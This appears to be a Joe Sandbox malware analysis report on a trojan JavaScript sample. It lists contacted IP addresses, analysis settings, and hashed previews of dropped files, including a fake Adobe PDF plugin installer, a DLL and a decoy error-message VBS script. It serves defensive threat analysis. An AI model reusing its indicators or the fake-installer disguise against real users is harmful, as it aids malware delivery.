                                                                                                                                                                                                          83.249.198.100
                                                                                                                                                                                                          unknownSweden
                                                                                                                                                                                                          39651COMHEM-SWEDENSEtrue
                                                                                                                                                                                                          12.172.173.82
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          2386INS-ASUStrue
                                                                                                                                                                                                          47.199.241.39
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          5650FRONTIER-FRTRUStrue
                                                                                                                                                                                                          79.168.224.165
                                                                                                                                                                                                          unknownPortugal
                                                                                                                                                                                                          2860NOS_COMUNICACOESPTtrue
                                                                                                                                                                                                          199.27.66.213
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          40608HCTNEBRASKAUStrue
                                                                                                                                                                                                          176.142.207.63
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          5410BOUYGTEL-ISPFRtrue
                                                                                                                                                                                                          86.176.83.44
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                                                                                                                                          92.154.17.149
                                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                                          3215FranceTelecom-OrangeFRtrue
                                                                                                                                                                                                          65.95.141.84
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          577BACOMCAtrue
                                                                                                                                                                                                          50.68.204.71
                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                          6327SHAWCAtrue
                                                                                                                                                                                                          89.79.229.50
                                                                                                                                                                                                          unknownPoland
                                                                                                                                                                                                          6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingtrue
                                                                                                                                                                                                          71.38.155.217
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          209CENTURYLINK-US-LEGACY-QWESTUStrue
                                                                                                                                                                                                          77.126.99.230
                                                                                                                                                                                                          unknownIsrael
                                                                                                                                                                                                          9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystetrue
                                                                                                                                                                                                          103.123.223.133
                                                                                                                                                                                                          unknownIndia
                                                                                                                                                                                                          138329KWS-AS-APKenstarWebSolutionsPrivateLimitedINtrue
                                                                                                                                                                                                          31.53.29.235
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                                                                                                                                          198.2.51.242
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20001TWC-20001-PACWESTUStrue
                                                                                                                                                                                                          93.147.235.8
                                                                                                                                                                                                          unknownItaly
                                                                                                                                                                                                          30722VODAFONE-IT-ASNITtrue
                                                                                                                                                                                                          92.9.45.20
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                                                                                                                                                                                                          113.11.92.30
                                                                                                                                                                                                          unknownBangladesh
                                                                                                                                                                                                          7565BDCOM-BDRangsNiluSquare5thFloorHouse75Road5ADtrue
                                                                                                                                                                                                          77.86.98.236
                                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                                          12390KINGSTON-UK-ASGBtrue
                                                                                                                                                                                                          172.115.17.50
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20001TWC-20001-PACWESTUStrue
                                                                                                                                                                                                          Joe Sandbox Version:37.1.0 Beryl
                                                                                                                                                                                                          Analysis ID:880006
                                                                                                                                                                                                          Start date and time:2023-06-01 17:53:26 +02:00
                                                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 11m 7s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:light
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • HDC enabled
                                                                                                                                                                                                          • GSI enabled (Javascript)
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample file name:ProjectFunding_450726_Jun01.js
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal80.troj.evad.winJS@10/19@3/100
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HDC Information:
                                                                                                                                                                                                          • Successful, ratio: 100% (good quality ratio 52.9%)
                                                                                                                                                                                                          • Quality average: 35.3%
                                                                                                                                                                                                          • Quality standard deviation: 39.4%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .js
                                                                                                                                                                                                          • Override analysis time to 240s for JS/VBS files not yet terminated
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 104.77.42.179
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.cisco.com.akadns.net, wwwds.cisco.com.edgekey.net, wwwds.cisco.com.edgekey.net.globalredir.akadns.net, e2867.dsca.akamaiedge.net
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • VT rate limit hit for: ProjectFunding_450726_Jun01.js
                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          17:54:27API Interceptor1x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                          17:54:37API Interceptor9x Sleep call for process: wermgr.exe modified
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):9201
                                                                                                                                                                                                          Entropy (8bit):5.550713453939256
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:1ymr7moef7o5MYmEgmlwgemBsMYmEgmlwgcDmxhPUVpQ9:1ymnmH7o5MYmEgmlwLmmMYmEgmlwtmrL
                                                                                                                                                                                                          MD5:D3AB0C4C234E197770FFB662F8D2ADD6
                                                                                                                                                                                                          SHA1:F9AFEA7435358FD12FB99AE6E8F36F1B61BEDD26
                                                                                                                                                                                                          SHA-256:28CEBD74C73D91074958A3C44414B13457B12E352529C2ECED536DB3D0CC955D
                                                                                                                                                                                                          SHA-512:722B2EB2A98DF9E5D62FE169A4F2A3CA15E982776D1211B1BA7FA67DBEFD501D49C974D6E4DB2568BC4E879FE298FC0C09FEA98D9AD1A1920D601F0F916454F9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...@IXOS.@.....@...V.@.....@.....@.....@.....@.....@......&.{FC992331-A040-46AF-B687-6A9DBF590393}'.Adobe Acrobat PDF Browser Plugin 4.8.25..rlvoq0.msi.@.....@.....@.....@........&.{8C788FE0-D109-4927-9111-67E9237DDA2D}.....@.....@.....@.....@.......@.....@.....@.......@....'.Adobe Acrobat PDF Browser Plugin 4.8.25......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}&.{FC992331-A040-46AF-B687-6A9DBF590393}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..:.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\....B.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll....D.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....%.Software\AdobeAcrobatPDFBrowserPlugin...@....(.&...AdobeAcrobatPDFBro
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):770192
                                                                                                                                                                                                          Entropy (8bit):6.877945867252055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:ovXYcP7kXn89DhAw1vUN3RFEycMFSDXxqEbfRh+NjAyejvDYTr80chn:mvTkXnyDPORDccmEsP+NjAyej7YE0a
                                                                                                                                                                                                          MD5:C1DAB9850EE6F747A7473D1530BCAAD9
                                                                                                                                                                                                          SHA1:9232348D0A02433019A6D6CCB4D498BFEC8C830E
                                                                                                                                                                                                          SHA-256:98C6DCDD89973784E26244B1D45CD7A120D909D1EB88326130B729741EC22BFC
                                                                                                                                                                                                          SHA-512:0C52CDCA863976D2B9B12DEE2F98B90954AD32B4C1E39591C2BE7E6AEB1D4B9B459DA16DEFA9A37F131BF358414913A8F9D24C55C178D2CAD84FE066F69DC49A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Fz[XFz[XFz[XO..XBz[X]..XCz[XFzZX.x[X.4.XGz[X]..XEz[X]..XKz[X]..X!z[X]..XGz[X]..XGz[X]..XGz[XRichFz[X................PE..L.....6P...........!.........t.......................................................9....@......................... ....D...[..d....P.......................`..<...0...............................H<..@............................................text...E........................... ..`.rdata...p.......r..................@..@.data...D%... ..."..................@....rsrc........P....... ..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):132
                                                                                                                                                                                                          Entropy (8bit):4.599233980549996
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:LwBxFkvH4dGmMKLVKRLGPz4VAFkvH4dGmMKLVKRLGH:cHFkvYdlZKRLi7FkvYdlZKRL4
                                                                                                                                                                                                          MD5:0D4C9F15CE74465C59AE36A27F98C817
                                                                                                                                                                                                          SHA1:9CCE8EEFA4D3D9C5E161C5DBB860CFE1489C6B1A
                                                                                                                                                                                                          SHA-256:D24E3399060B51F3A1C9D41A67DE2601888A35C99DA8DB70070D757BB3F1913A
                                                                                                                                                                                                          SHA-512:9BED0EAFC2CF2A2360850CA1070FFB04AC14F04C78379485998A93F45012B5C11CC7F6F68129F65B8B5F90437CB965908C6A1BB9D83A56B068D6BDE1D5FDAD1F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MsgBox "Adobe Acrobat PDF Browser Plugin installation error 0x00000328", 16, "Adobe Acrobat PDF Browser Plugin installation error"..
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1206), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):77474
                                                                                                                                                                                                          Entropy (8bit):5.0975849792978245
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:ZBLiUj6cYhYr3UfFROQ18PDqvcgcX8curLyFb31WDk12ttFYUscdy/Rw8AVsIYuC:fvoZ0D+eUd9poc1F2
                                                                                                                                                                                                          MD5:CA00DD38DFB18DB50C407E005B8A326D
                                                                                                                                                                                                          SHA1:8AD25F10907B838CCE8CD894E71E11F7C7A73FB4
                                                                                                                                                                                                          SHA-256:721F41602C70EE036C8B73D75E5DC9EBB1E370D3EB95CD89F46DE22846968EC4
                                                                                                                                                                                                          SHA-512:BE9E03BAF696734A9953EEAA39DE3AB665209FED07AB58A2D88D6D1E414C1075670BAE2973F9DA435E52CC8BCDA6C8DCAB442F27C314ABC877C19C9675247FAA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.<!DOCTYPE HTML>..<html lang="en-US" dir="ltr">. <head>. <meta charset="UTF-8"/>. <meta name="HandheldFriendly" content="True"/>. <meta name="MobileOptimized" content="320"/>. <meta name="viewport" content="width=device-width, initial-scale=1.0"/>.. <title>Networking, Cloud, and Cybersecurity Solutions - Cisco</title>.. .............<meta name="description" content="Cisco delivers innovative software-defined networking, cloud, and security solutions to help transform your business, empowering an inclusive future for all. "/>......<meta name="title" content="Networking, Cloud, and Cybersecurity Solutions"/>......<meta name="templateName" content="homepage"/>......<meta name="locale" content="English (United States)"/>......<meta name="language" content="en"/>......<meta name="country" content="US"/>......<meta name="CCID_Page" content="cc001769"/>......<meta name="date" content="Wed May 31 20:02:34 UTC 2023"/>.....<meta name="accessLevel" content="Customer"/><meta n
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {8C788FE0-D109-4927-9111-67E9237DDA2D}, Create Time/Date: Thu Jun 1 15:57:00 2023, Last Saved Time/Date: Thu Jun 1 15:57:00 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):413696
                                                                                                                                                                                                          Entropy (8bit):7.876811826694354
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:qnVPe+3R6gz8C1psDVw8EAYwzPJLNee9iZiYnCpqvY1dGujAyep5vDukjZkUHU:BxCriEQzPJLNee9Lp1NjAyefvDTjRU
                                                                                                                                                                                                          MD5:6CDBF973811A5C53B53693E2BBDD9911
                                                                                                                                                                                                          SHA1:6096B291FF91666F67B147604EDD16B74583BD94
                                                                                                                                                                                                          SHA-256:42D8AA89DE1988158D3402468BDC03E1199D1BB6730D88FB2B334EAEF5151B4E
                                                                                                                                                                                                          SHA-512:7243EE804B852E1B94F53D0D9200C61563B65CB22F22705D1F2DE5C760CEB2BBF46BE9E23071EC11F946030F3CB73D44F774037A75EA4B9D724A82768FDC339A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2183
                                                                                                                                                                                                          Entropy (8bit):5.628154039319557
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:EnyctSa8EJwCP3lDufgGYLEBoD8SY1eU/uneyctnzaEVltiCEjyct2yctJ:Enymr82mYLKAueteymnzaEPNEym2ymJ
                                                                                                                                                                                                          MD5:D5B88FB1D18B735124FDF00C8AF33D91
                                                                                                                                                                                                          SHA1:A1792F12D8329959D0A8CDF1A5001C6B97C34771
                                                                                                                                                                                                          SHA-256:4EF3F3575E13F5FD341706A0C1B2E85FA8B0473CBE2F78EF214A410B3B7139A3
                                                                                                                                                                                                          SHA-512:8AE9A692F8C29114F830305E78606B683322F2DFCDD9B5FB47FE1EBADF3AA8AB7C4C36DE2F59A3470318830D84947C634E05317F6B2468E0C2A6957B72B1AC56
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...@IXOS.@.....@...V.@.....@.....@.....@.....@.....@......&.{FC992331-A040-46AF-B687-6A9DBF590393}'.Adobe Acrobat PDF Browser Plugin 4.8.25..rlvoq0.msi.@.....@.....@.....@........&.{8C788FE0-D109-4927-9111-67E9237DDA2D}.....@.....@.....@.....@.......@.....@.....@.......@....'.Adobe Acrobat PDF Browser Plugin 4.8.25......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}F.01:\Software\AdobeAcrobatPDFBrowserPlugin\AdobeAcrobatPDFBrowserPlugin.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@......:.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\..).1\xssanpen\|AdobeAcrobatPDFBrowserPlugin\......Please insert the disk: ..media3.cab.@.....@......C:\Windows\Installer\MSI980.tmp.........@........main.dll..dll_main..main.dll.@.....@.....@.......@...
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {8C788FE0-D109-4927-9111-67E9237DDA2D}, Create Time/Date: Thu Jun 1 15:57:00 2023, Last Saved Time/Date: Thu Jun 1 15:57:00 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):413696
                                                                                                                                                                                                          Entropy (8bit):7.876811826694354
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:qnVPe+3R6gz8C1psDVw8EAYwzPJLNee9iZiYnCpqvY1dGujAyep5vDukjZkUHU:BxCriEQzPJLNee9Lp1NjAyefvDTjRU
                                                                                                                                                                                                          MD5:6CDBF973811A5C53B53693E2BBDD9911
                                                                                                                                                                                                          SHA1:6096B291FF91666F67B147604EDD16B74583BD94
                                                                                                                                                                                                          SHA-256:42D8AA89DE1988158D3402468BDC03E1199D1BB6730D88FB2B334EAEF5151B4E
                                                                                                                                                                                                          SHA-512:7243EE804B852E1B94F53D0D9200C61563B65CB22F22705D1F2DE5C760CEB2BBF46BE9E23071EC11F946030F3CB73D44F774037A75EA4B9D724A82768FDC339A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                          Entropy (8bit):1.5139341423847625
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:48PhfuRc06WXOCjT5QwnTuLMS59CuSiyZuLMSI818lPh:Hhf1UjTmAPQCWU
                                                                                                                                                                                                          MD5:85A839A2B53A56555B7D91C34CDBA910
                                                                                                                                                                                                          SHA1:CAF5022AF9D098DBD42728A7596FBE065AC50434
                                                                                                                                                                                                          SHA-256:944815393D9FEF1B532A1E16AE940C89F5D440E34151B125125191D2EB232986
                                                                                                                                                                                                          SHA-512:03B5C6593C8A97C5D6C23D4C90EE76E5991538DBD995D7FD61948ACBA71C335382C4ACF640EA6D426A912835B9DDBDC7CC8432170C08C053BCC016A0DFE35C99
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):69632
                                                                                                                                                                                                          Entropy (8bit):0.12385738335065163
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:xpMB70R818lOdWmOLqrb9ipVIdWmOLqrb9ipV7V3+bWG5sGgSi+9ZkZ+Qqy7:0KR818lEuLMSouLMS59CuSiyI/D
                                                                                                                                                                                                          MD5:5B105F69A0DC574281DCF82562C1A00C
                                                                                                                                                                                                          SHA1:A1124F5310787335178A1713F683481638781C29
                                                                                                                                                                                                          SHA-256:6F7CFDE8437832352E2ADA20018A9F32ECE2ECCA873AC0359EB1F37CEBA25434
                                                                                                                                                                                                          SHA-512:39E496C53C464F1E3BE345E5AA44F58A596DD8251114665132A466AF2EC624B9B9B272DFF23640F4BC92776053DE07751691603DA936DDDAE00F3C6D76FF57D2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                          Entropy (8bit):1.5139341423847625
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:48PhfuRc06WXOCjT5QwnTuLMS59CuSiyZuLMSI818lPh:Hhf1UjTmAPQCWU
                                                                                                                                                                                                          MD5:85A839A2B53A56555B7D91C34CDBA910
                                                                                                                                                                                                          SHA1:CAF5022AF9D098DBD42728A7596FBE065AC50434
                                                                                                                                                                                                          SHA-256:944815393D9FEF1B532A1E16AE940C89F5D440E34151B125125191D2EB232986
                                                                                                                                                                                                          SHA-512:03B5C6593C8A97C5D6C23D4C90EE76E5991538DBD995D7FD61948ACBA71C335382C4ACF640EA6D426A912835B9DDBDC7CC8432170C08C053BCC016A0DFE35C99
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):1.2160379124181024
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:96sHudGMLFXO1T5xwnTuLMS59CuSiyZuLMSI818lPh:NHaoTXAPQCWU
                                                                                                                                                                                                          MD5:728071432EDD86E0F409E56F049713EE
                                                                                                                                                                                                          SHA1:323CFD840E915D18EEE7B26940BD5EC7C96BDB7A
                                                                                                                                                                                                          SHA-256:8145EC08F28849AAB41165038EE8D14A1C6BDAD2E40456A7653FBB3FDFF5C53D
                                                                                                                                                                                                          SHA-512:95C4082EC1CBB9A8B3EF7BBACCE7300836FA5F16F4EF669EA42DCBB2E40033B886689511C281216C9F5E9289B0ADE8E2E57BC5F8B81A24233BAED9C9408362FF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                          Entropy (8bit):1.5139341423847625
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:48PhfuRc06WXOCjT5QwnTuLMS59CuSiyZuLMSI818lPh:Hhf1UjTmAPQCWU
                                                                                                                                                                                                          MD5:85A839A2B53A56555B7D91C34CDBA910
                                                                                                                                                                                                          SHA1:CAF5022AF9D098DBD42728A7596FBE065AC50434
                                                                                                                                                                                                          SHA-256:944815393D9FEF1B532A1E16AE940C89F5D440E34151B125125191D2EB232986
                                                                                                                                                                                                          SHA-512:03B5C6593C8A97C5D6C23D4C90EE76E5991538DBD995D7FD61948ACBA71C335382C4ACF640EA6D426A912835B9DDBDC7CC8432170C08C053BCC016A0DFE35C99
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):1.2160379124181024
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:96sHudGMLFXO1T5xwnTuLMS59CuSiyZuLMSI818lPh:NHaoTXAPQCWU
